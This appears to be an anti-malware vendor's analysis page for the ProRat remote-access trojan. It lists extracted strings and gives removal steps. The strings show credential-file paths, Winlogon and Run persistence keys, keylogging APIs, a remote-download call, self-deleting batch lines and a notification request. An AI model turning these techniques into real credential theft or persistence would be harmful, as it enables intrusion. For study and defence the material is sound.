cuteftp
Login :
Password :
Pass :
SOFTWARE\Microsoft\Windows\CurrentVersion
%Program Files%
\GlobalSCAPE\CuteFTP\sm.dat
\GlobalSCAPE\CuteFTP\smdata.dat
\CuteFTP\tree.dat
\CuteFTP\smdata.dat
\GlobalSCAPE\CuteFTP Pro\sm.dat
\GlobalSCAPE\CuteFTP\5.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\2.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\3.0\sm.dat
\GlobalSCAPE\CuteFTP Pro\6.0\sm.dat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings
\RSACi.rat
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\.Default\hXXp://VVV.rsac.org/ratingsv01.html
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy
\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\PICSRules\.Default\0\PRPolicy\
PRNumURLExpressions
PRBUPort
PRBUUrl
Sites.dat
Password :
Port :
Tport_atm=0
\reg_ent.reg
regedit.exe /s
\winrar.exe
Microsoft Windows NT
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 95
Microsoft Windows 98
Microsoft Windows Me
\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\
d_.exe
winoa386.mod
\scrpt.bat
\scrpt.vbs
\winkey.dll
\reginv.dll
127.0.0.1
.jpeg
\win.ini
\system.ini
Explorer.exe
del %c%s%c
if exist %c%s%c goto 1
del À
\system32\fservice.exe
\system\sservice.exe
\mps.atm
\kdd32.atm
\system32\winkey.dll
\system\winkey.dll
\system32\wininv.dll
\system\wininv.dll
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
Windows
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
Explorer.exe
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag
GET /friendship/email_thank_you.php?folder_id=18984¶ms_count=0&nick_name=Pro_Rat&user_email=Pro_Rat@yahoo.com&user_uin=&friend_nickname=&friend_contact=
&friend_nickname2=&friend_contact2=&x=60&y=15 HTTP/1.1
Referer: hXXp://VVV.icq.com/friendship/pages/send_by_email_18984.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.icq.com
Software\Microsoft\Windows\CurrentVersion\Policies\System
c:\autoexec.bat
\p_ekran.jpg
services.exe
msn.ini
yahoo.ini
Windows Ver :
Windows Language :
Windows Path :
software\microsoft\windows\currentversion
VVV.icq.com
Port :
Password :
Microsoft Outlook Express 6.00.2800.1158
\p_ekran.bmp
SOFTWARE\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings
Tport
Pplugin1.dll
Pplugin2.dll
Pplugin3.dll
Pplugin4.exe
Pplugin4.dat
Pplugin4.exe /stext
ktd32.atm
Pplugin8.exe
PpluginCd.dll
Pplugin9.dat
Pplugin8.exe /stext
Pplugin10xa.exe
Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ProRat@Yahoo.Com
<ProRat@Yahoo.Com>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
C:\Windows\
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
220 Welcom to ProRat Ftp Server
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc
JPEG error #%d






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    WINDOWSAPP.EXE:1024
    fservice.exe:3584
    %original file name%.exe:3308
    FACEBOOK.EXE.EXE:2472
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    C:\Windows\System32\FACEBOOK.EXE.EXE (1742 bytes)
    C:\Windows\services.exe (2457 bytes)
    C:\Windows\system\sservice.exe (2105 bytes)
    C:\Windows\System32\fservice.exe (2457 bytes)
    C:\Windows\System32\WINDOWSAPP.EXE (877 bytes)
    C:\Windows\System32\lncom_.png (66260 bytes)
    C:\Windows\System32\FACEBO~1.EXE.bat (109 bytes)
    C:\Windows\System32\FACEBOOK.EXE.png (3073 bytes)
    C:\Windows\System32\lncom.exe (45172 bytes)
    

    4. 

  4. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "Explorer.exe C:\Windows\system32\fservice.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2025 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now